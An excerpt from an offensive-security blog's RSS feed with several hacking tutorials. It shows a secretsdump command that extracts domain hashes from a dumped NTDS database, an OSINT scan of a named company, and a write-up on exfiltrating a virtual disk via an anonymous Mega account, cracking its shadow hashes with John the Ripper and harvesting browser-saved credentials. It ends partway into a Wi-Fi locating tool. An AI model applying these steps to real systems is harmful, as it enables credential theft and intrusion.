<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="461" src="https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc-1024x461.webp" alt="dumping NTDS with ntds.ps1 script" class="wp-image-18587" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc-1024x461.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc-300x135.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc-768x346.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/9-dumping-ntds-on-a-dc.webp 1171w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Evil-WinRM has a download command that can help you extract the files. After that, run this command:
<code>bash$ > secretsdump.py -ntds ntds.dit -sam SAM -system SYSTEM LOCAL</code>
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="513" src="https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes-1024x513.webp" alt="extracting creds from the ntds dump" class="wp-image-18588" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes-1024x513.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes-300x150.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes-768x385.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/10-extracting-ntds-hashes.webp 1476w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<h2 class="wp-block-heading">Summary</h2>
In this chapter, we explored how PowerShell can be used for privilege escalation and complete domain compromise. We began with bypassing AMSI to clear the way for running offensive scripts without interference, then moved on to credential dumping with Mimikatz. From there, we looked at privilege escalation techniques such as unquoted service paths with PowerUp, followed by dumping NTDS and SAM databases once higher privileges were achieved. Each step builds on the previous one, showing how hackers chain small misconfigurations into full organizational takeover. Defenders should also be familiar with these attacks as it will help them tune the security products. For instance, harmless actions such as creating a shadow copy to dump NTDS and SAM can be spotted if you monitor Event ID 8193 and Event ID 12298. Many activities can be monitored, even benign ones. It depends on where defenders are looking at.The post <a href="https://hackers-arise.com/powershell-for-hackers-privilege-escalation-and-organization-takeover/">PowerShell for Hackers, Part 8: Privilege Escalation and Organization Takeover</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>Getting Started with the Raspberry Pi for Hacking: Using Spiderfoot for OSINT Data Gathering</title>
<link>https://hackers-arise.com/getting-started-with-the-raspberry-pi-for-hacking-using-spiderfoot-for-osint-data-gathering/</link>
<dc:creator><![CDATA[aircorridor]]></dc:creator>
<pubDate>Tue, 07 Oct 2025 14:48:38 +0000</pubDate>
<category><![CDATA[OSINT & Reconnaissance]]></category>
<category><![CDATA[Raspberry Pi]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=18442</guid>
<description><![CDATA[Welcome back, aspiring hackers! Raspberry Pi is a great starting point for exploring cybersecurity and hacking in particular. You can grab a $50 board, connect it to the TV, and start learning. Otherwise, you can install the OS on the Pi and control it from your phone. There are a lot of opportunities. In this article, […]
The post <a href="https://hackers-arise.com/getting-started-with-the-raspberry-pi-for-hacking-using-spiderfoot-for-osint-data-gathering/">Getting Started with the Raspberry Pi for Hacking: Using Spiderfoot for OSINT Data Gathering</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring hackers!
Raspberry Pi is a great starting point for exploring cybersecurity and hacking in particular. You can grab a $50 board, connect it to the TV, and start learning. Otherwise, you can install the OS on the Pi and control it from your phone. There are a lot of opportunities.
In this article, I’d like to demonstrate how to use a Raspberry Pi for Open Source Intelligence (OSINT) gathering. This a key reconnaissance step before the attack.
<h2 class="wp-block-heading">Step #1: Understand Where to Start?</h2>
There is a wealth of OSINT tools—some have faded away, while new ones constantly emerge. Spiderfoot, for example, has been quietly serving OSINT investigators since 2012.
This tool serves as a starting point in the investigation. It is capable of gathering information from multiple resources automatically with little or no manual interaction. Once this data has been gathered, you can export the results in CSV/JSON or feed scan data to Splunk/ElasticSearch.
<h2 class="wp-block-heading">Step #2: Getting Started with Spiderfoot</h2>
In the previous article we installed Kali Linux on a Raspberry Pi, which comes with Spiderfoot pre‑installed. Let’s take a look at its help page:
<code>kali> spiderfoot -h</code>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="882" height="416" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_help.webp" alt="" class="wp-image-18446" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_help.webp 882w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_help-300x141.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_help-768x362.webp 768w" sizes="(max-width: 882px) 100vw, 882px" /></figure>
To get started, it is enough to run the following command: <code>kali> spiderfoot -l 0.0.0.0:port</code>
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="892" height="356" src="https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_start_the_server.webp" alt="" class="wp-image-18447" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_start_the_server.webp 892w, https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_start_the_server-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_start_the_server-768x307.webp 768w" sizes="(max-width: 892px) 100vw, 892px" /></figure>
Where
-l – tells it to listen for incoming HTTP connections; 0.0.0.0:4444 – the address + port where the web UI will be bound. 0.0.0.0 means “any reachable IP on this machine,” so you can reach the UI from another host on the same network.
By typing http://:<IP>:4444/ on the web browser of any computer/phone on this Local Area Network (LAN), anyone can get access to the spiderfoot user interface.
<figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="961" height="383" src="https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_ui.webp" alt="" class="wp-image-18449" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_ui.webp 961w, https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_ui-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spyderfoot_ui-768x306.webp 768w" sizes="(max-width: 961px) 100vw, 961px" /></figure>
<h2 class="wp-block-heading">Step #3: Spiderfoot Modules</h2>
By default, Spiderfoot includes more than 200 modules, most of which operate without any API keys. However, adding the appropriate API keys in the settings can significantly boost the effectiveness of your scans.
<figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="598" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api-1024x598.webp" alt="" class="wp-image-18450" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api-1024x598.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api-300x175.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api-768x449.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_intelx_api.webp 1167w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<h2 class="wp-block-heading">Step #4: Start Scanning</h2>
SpiderFoot offers four primary scan types:
All: Runs every available module. Comprehensive but time-consuming, and may generate excessive queries.
Footprint: Lighter scan focusing on infrastructure and digital footprint.
Investigate: Some basic footprinting will be performed in addition to querying of blacklists and other sources that may have information about your target’s maliciousness.
Passive: Gathering information without touching the target or their affiliates.
Let’s run a “stealth” scan against the Russian oil company Lukoil. Once the scan completes, the Summary tab on the main screen will display an overview of the information that was uncovered.
<figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="648" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results-1024x648.webp" alt="" class="wp-image-18451" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results-1024x648.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results-300x190.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results-768x486.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_scan_results.webp 1180w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
By clicking the Browse tab, we can review the results.
<figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="481" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data-1024x481.webp" alt="" class="wp-image-18452" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data-1024x481.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data-300x141.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data-768x361.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_browse_data.webp 1172w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
One of spiderfoot’s standout features is its ability to visualize data graphically.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="654" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph-1024x654.webp" alt="" class="wp-image-18453" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph-1024x654.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph-300x192.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph-768x491.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph.webp 1202w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
In the graph, each node represents a distinct piece of information about the target.
<figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="407" src="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes-1024x407.webp" alt="" class="wp-image-18454" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes-1024x407.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes-300x119.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes-768x305.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/spiderfoot_graph_nodes.webp 1268w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
<h2 class="wp-block-heading">Summary</h2>
In this simple approach, you can use a Raspberry Pi to conduct OSINT investigations without installing anything on your primary system. Moreover, you can access the Pi’s IP address from your phone and review the results during a coffee break—or whenever you have a spare moment.
As mentioned in the introduction, the Raspberry Pi is a powerful platform for learning cybersecurity.
If you’d like to advance in this field, consider checking out our OSINT training class.The post <a href="https://hackers-arise.com/getting-started-with-the-raspberry-pi-for-hacking-using-spiderfoot-for-osint-data-gathering/">Getting Started with the Raspberry Pi for Hacking: Using Spiderfoot for OSINT Data Gathering</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
</item>
<item>
<title>Using Digital Forensic Techniques to Compromise Russian Linux Systems</title>
<link>https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/</link>
<comments>https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/#respond</comments>
<dc:creator><![CDATA[Co11ateral]]></dc:creator>
<pubDate>Mon, 06 Oct 2025 17:54:47 +0000</pubDate>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Digital Forensics]]></category>
<category><![CDATA[Linux]]></category>
<category><![CDATA[Offensive Security]]></category>
<category><![CDATA[Password Cracking]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=17056</guid>
<description><![CDATA[Welcome back, cyberwarriors. In today’s article, we will walk through a real-world compromise that was made possible through digital forensics. During one of our recent engagements, we landed on a machine located outside the primary domain. Unfortunately, this system held no immediately useful credentials or access paths for lateral movement. Our team attempted a variety […]
The post <a href="https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/">Using Digital Forensic Techniques to Compromise Russian Linux Systems</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="683" src="https://hackers-arise.com/wp-content/uploads/2025/08/banner-1024x683.webp" alt="" class="wp-image-17057" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/banner-1024x683.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/banner-300x200.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/banner-768x512.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/banner.webp 1536w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Welcome back, cyberwarriors. In today’s article, we will walk through a real-world compromise that was made possible through digital forensics. During one of our recent engagements, we landed on a machine located outside the primary domain. Unfortunately, this system held no immediately useful credentials or access paths for lateral movement. Our team attempted a variety of techniques to extract credentials, ranging from standard SAM parsing to log file analysis and general file inspection. Eventually, we uncovered a valuable asset buried within one of the attached drives, which was a virtual disk.
For those who read our earlier write-up on compromising a domain through forensic analysis of an old Windows image, you’ll recall how helpful such approaches can be. The same logic applies to Linux systems. Even if the machine in question is inactive, cracking old credentials can still enable lateral movement if password reuse is in play.
Let’s examine how we extracted, analyzed, and ultimately compromised this Linux virtual machine.
<h2 class="wp-block-heading"><a></a>Virtual Disk Discovery and Exfiltration</h2>
The virtual disk was located on a secondary drive of a Windows host. Due to limited space on the drive and to avoid disrupting the system, we chose to exfiltrate the disk to our lab for analysis.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="793" height="317" src="https://hackers-arise.com/wp-content/uploads/2025/08/1-vm-snapshot-found.webp" alt="" class="wp-image-17058" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/1-vm-snapshot-found.webp 793w, https://hackers-arise.com/wp-content/uploads/2025/08/1-vm-snapshot-found-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/1-vm-snapshot-found-768x307.webp 768w" sizes="(max-width: 793px) 100vw, 793px" /></figure>

One reliable method of transferring files from an RDP session is via the Mega cloud service. Using a temporary email address, you can create a Mega account anonymously.

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="504" src="https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega-1024x504.webp" alt="" class="wp-image-17059" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega-1024x504.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega-300x148.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega-768x378.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/2-snapshot-exfiltration-to-mega.webp 1125w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

Mega provides 20 GB of free storage per account, which is sufficient. If you need more, additional accounts or a paid plan will do the job.
<h2 class="wp-block-heading"><a></a>Loading the Virtual Machine in VMWare</h2>
Once the file was safely downloaded, we opened VMWare and imported it. In this case, it was a .vmdk file, which is natively supported by VMWare.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="812" height="188" src="https://hackers-arise.com/wp-content/uploads/2025/08/3-downloading-the-snapshot.webp" alt="" class="wp-image-17060" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/3-downloading-the-snapshot.webp 812w, https://hackers-arise.com/wp-content/uploads/2025/08/3-downloading-the-snapshot-300x69.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/3-downloading-the-snapshot-768x178.webp 768w" sizes="(max-width: 812px) 100vw, 812px" /></figure>

During the import process, VMWare will prompt for a name for the virtual machine and automatically generate a folder in your local environment. Errors can occasionally occur during import. If so, clicking “Retry” generally resolves the issue.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="730" height="384" src="https://hackers-arise.com/wp-content/uploads/2025/08/4-importing-the-snapshot-to-vmware.webp" alt="" class="wp-image-17061" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/4-importing-the-snapshot-to-vmware.webp 730w, https://hackers-arise.com/wp-content/uploads/2025/08/4-importing-the-snapshot-to-vmware-300x158.webp 300w" sizes="(max-width: 730px) 100vw, 730px" /></figure>

Once the VM was successfully imported, we attempted to boot it. The machine started as expected, but we were greeted with a login screen requiring credentials.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="795" height="645" src="https://hackers-arise.com/wp-content/uploads/2025/08/5-booting-the-virtual-machine.webp" alt="" class="wp-image-17062" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/5-booting-the-virtual-machine.webp 795w, https://hackers-arise.com/wp-content/uploads/2025/08/5-booting-the-virtual-machine-300x243.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/5-booting-the-virtual-machine-768x623.webp 768w" sizes="(max-width: 795px) 100vw, 795px" /></figure>

At this point, you might be tempted to guess weak passwords manually, but a more systematic approach involves unpacking the virtual disk to inspect the filesystem directly.
<h2 class="wp-block-heading"><a></a>Unpacking the Virtual Disk</h2>
The .vmdk file can be unpacked using 7-Zip. The following command does the job in PowerShell:
PS > & “C:\Program Files\7-Zip\7z.exe” x .\vmc-disk1.vmdk -oC:\VM-Extract -y

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="422" src="https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics-1024x422.webp" alt="" class="wp-image-17063" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics-1024x422.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics-300x124.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics-768x316.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/6-extracting-files-from-the-snapshot-for-digital-forensics.webp 1083w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

This extracts the contents of the virtual disk into a new folder called VM-Extract on the C drive. In this case, we obtained three disk image files. The next step was to mount these images to access their contents.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="715" height="127" src="https://hackers-arise.com/wp-content/uploads/2025/08/7-files-extracted-from-the-snapshot.webp" alt="" class="wp-image-17064" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/7-files-extracted-from-the-snapshot.webp 715w, https://hackers-arise.com/wp-content/uploads/2025/08/7-files-extracted-from-the-snapshot-300x53.webp 300w" sizes="(max-width: 715px) 100vw, 715px" /></figure>

<h2 class="wp-block-heading">Mounting Linux Filesystems on Windows</h2>
Since Windows cannot interpret Linux filesystems by default, attempting to mount them natively results in an error or a prompt to format the disk. To avoid this, we used DiskInternals Linux Reader, a free tool that can interpret and mount EXT-based filesystems.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="626" height="284" src="https://hackers-arise.com/wp-content/uploads/2025/08/8-showcasing-DiskInternals-Linux-Reader.webp" alt="" class="wp-image-17065" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/8-showcasing-DiskInternals-Linux-Reader.webp 626w, https://hackers-arise.com/wp-content/uploads/2025/08/8-showcasing-DiskInternals-Linux-Reader-300x136.webp 300w" sizes="(max-width: 626px) 100vw, 626px" /></figure>

Upon launching the tool, go to Drives > Mount Image, select the Raw Disk Images option, and then choose all the extracted image files.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="618" height="382" src="https://hackers-arise.com/wp-content/uploads/2025/08/9-setting-up-DiskInternals-Linux-Reader.webp" alt="" class="wp-image-17066" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/9-setting-up-DiskInternals-Linux-Reader.webp 618w, https://hackers-arise.com/wp-content/uploads/2025/08/9-setting-up-DiskInternals-Linux-Reader-300x185.webp 300w" sizes="(max-width: 618px) 100vw, 618px" /></figure>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="938" height="525" src="https://hackers-arise.com/wp-content/uploads/2025/08/10-selecting-extracted-inmages-for-mounting.webp" alt="" class="wp-image-17067" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/10-selecting-extracted-inmages-for-mounting.webp 938w, https://hackers-arise.com/wp-content/uploads/2025/08/10-selecting-extracted-inmages-for-mounting-300x168.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/10-selecting-extracted-inmages-for-mounting-768x430.webp 768w" sizes="(max-width: 938px) 100vw, 938px" /></figure>

Once completed, you should see the Linux filesystem appear in the Linux Reader interface, allowing you to navigate through its structure.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="737" height="121" src="https://hackers-arise.com/wp-content/uploads/2025/08/11-the-linux-drive-has-been-mounted.webp" alt="" class="wp-image-17068" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/11-the-linux-drive-has-been-mounted.webp 737w, https://hackers-arise.com/wp-content/uploads/2025/08/11-the-linux-drive-has-been-mounted-300x49.webp 300w" sizes="(max-width: 737px) 100vw, 737px" /></figure>

<h2 class="wp-block-heading">Initial Analysis</h2>
With access to the mounted filesystem, our first goal was to recover the stored credentials. System administrators frequently reuse passwords, so even stale credentials can provide lateral movement opportunities. Additionally, Linux systems often lack comprehensive security tooling, making them ideal for establishing long-term persistence.

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file-1024x639.webp" alt="" class="wp-image-17069" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file-1024x639.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file-300x187.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file-768x479.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/12-analyzing-shadow-file.webp 1239w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

We began by locating the /etc/shadow file, which stores password hashes. On this system, the hashing algorithm used was yescrypt, a modern and secure scheme not currently supported by Hashcat. That said, John the Ripper does support it, and we’ll return to this shortly.
Next, we exported .bash_history from /home/user/ and /root/. This file logs command history for the user and often includes IP addresses, script execution details, and occasionally even plaintext passwords. If Linux Reader fails to display the file due to size limitations, right-click and export it to your Windows host for proper inspection.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="901" height="482" src="https://hackers-arise.com/wp-content/uploads/2025/08/13-analyzing-the-history-file.webp" alt="" class="wp-image-17070" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/13-analyzing-the-history-file.webp 901w, https://hackers-arise.com/wp-content/uploads/2025/08/13-analyzing-the-history-file-300x160.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/13-analyzing-the-history-file-768x411.webp 768w" sizes="(max-width: 901px) 100vw, 901px" /></figure>

Beyond bash history, another good target is the crontab directory. Some cron jobs use embedded credentials in scripts for automated tasks, which can also be repurposed for access.
<h2 class="wp-block-heading"><a></a>Password Recovery Using John the Ripper</h2>
As Hashcat cannot currently handle yescrypt, we opted to use John the Ripper. The syntax is straightforward:
kali > sudo john –format=crypt –wordlist=rockyou.txt hashes.txt

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="182" src="https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper-1024x182.webp" alt="" class="wp-image-17071" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper-1024x182.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper-300x53.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper-768x136.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/14-cracking-hash-with-john-the-ripper.webp 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

The output might look like an error, especially if the cracked password is something as simple as “1”, but that was indeed the correct password for both user accounts on this machine. We tested it, and it worked. We had successfully logged into the virtual machine.

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="544" src="https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-1024x544.webp" alt="" class="wp-image-17072" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-1024x544.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-300x160.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-768x408.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm-1536x817.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/08/15-unlocking-the-vm.webp 1815w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

<h2 class="wp-block-heading">Post-Access Exploration</h2>
With access to the virtual environment, we began exploring more thoroughly. One of the first things we reviewed was the browser history, followed by saved credentials in applications like Mozilla Firefox. We also checked for authentication logs, Remmina session logs, which could provide saved credentials or remote system details.

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="343" src="https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser-1024x343.webp" alt="" class="wp-image-17073" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser-1024x343.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser-300x100.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser-768x257.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/08/16-found-credentials-in-the-browser.webp 1142w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

Indeed, we discovered a stored credential for a web service in Firefox. With this information, we scanned the internal network for hosts running the same service. If reachable, such services can often be exploited either by reusing the credentials or through a vulnerability in the service itself. In some cases, this leads to remote code execution and full system compromise.The post <a href="https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/">Using Digital Forensic Techniques to Compromise Russian Linux Systems</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/using-digital-forensic-techniques-to-compromise-russian-linux-systems/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s</title>
<link>https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/</link>
<comments>https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/#respond</comments>
<dc:creator><![CDATA[OTW]]></dc:creator>
<pubDate>Sat, 04 Oct 2025 15:46:24 +0000</pubDate>
<category><![CDATA[Python]]></category>
<category><![CDATA[Scripting]]></category>
<category><![CDATA[Wi-Fi Hacking]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=16533</guid>
<description><![CDATA[Hackers Arise Wi-Fi Radar Welcome back, aspiring cyberwarriors! One of our advanced student who goes by the handle Mike211 has developed a Wi-Fi scanning script that we want to share with all of you. What makes this script different and special is it’s ability to locate the Wi-Fi access points (AP) in your area. I”ll […]
The post <a href="https://hackers-arise.com/python-basics-for-hackers-building-a-wi-fi-scanner-capable-of-locating-the-position-of-local-aps/">Python Basics for Hackers: Building a Wi-Fi Scanner Capable of Locating the Position of Local AP’s</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[<h1 class="wp-block-heading">Hackers Arise Wi-Fi Radar </h1>

<h2 class="wp-block-heading">Welcome back, aspiring cyberwarriors!</h2>

One of our advanced student who goes by the handle Mike211 has developed a Wi-Fi scanning script that we want to share with all of you. What makes this script different and special is it’s ability to locate the Wi-Fi access points (AP) in your area.

I”ll let him introduce his new tool below!
In the Wi-Fi domain, raw signal strength and MAC identifiers can reveal more than just the presence of networks — they can open a path to estimating physical distance, mapping access points, and even executing wardriving missions or indoor localization without GPS. If you’ve ever wanted to push the boundaries of Wi-Fi auditing beyond mere detection, Hackers Arise Radar is your next-level tool.
<h2 class="wp-block-heading">Why this Tool is Game Changing</h2>
Just like Wigle.net collects crowdsourced location data of APs, this project allows you to discover and map Wi-Fi access points in real-time using only your Linux laptop or USB Wi-Fi adapter. 
With this tool, you’ll get:
– Continuous scans over 2.4 GHz, 5 GHz, 6 GHz, or all bands – Fully automated interface setup (monitor mode, regulatory domain, TX power) – Filtered and smoothed RSSI values with Kalman filtering – On-demand calibration for RSSI-to-distance – Spring-model map generation to visualize spatial relationships – Exportable logs, visuals, and calibration profiles for future use
Whether you’re driving through a city, walking indoors, or performing a pentest, you can leverage this tool for actionable location data.
<h2 class="wp-block-heading">How it Works – Step by Step</h2>
Step #1. Launch & Configuration
 Start the script:
 kali > sudo python3 Hackers_Arise_Radar.py
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="579" height="229" src="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-arise-radar-initiation.png" alt="" class="wp-image-16717" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-arise-radar-initiation.png 579w, https://hackers-arise.com/wp-content/uploads/2025/08/Hackers-arise-radar-initiation-300x119.png 300w" sizes="(max-width: 579px) 100vw, 579px" /></figure>
You’ll be greeted with a colorful terminal interface that guides you through:
 – Selecting your Wi-Fi interface – Choosing the operational environment (indoor, urban, open space) – Selecting scan band (2.4 GHz / 5 GHz / 6 GHz / All)
No need to manually enable monitor mode – the script automatically puts your adapter into monitor mode, sets the regulatory domain, and adjusts TX power based on your choices.
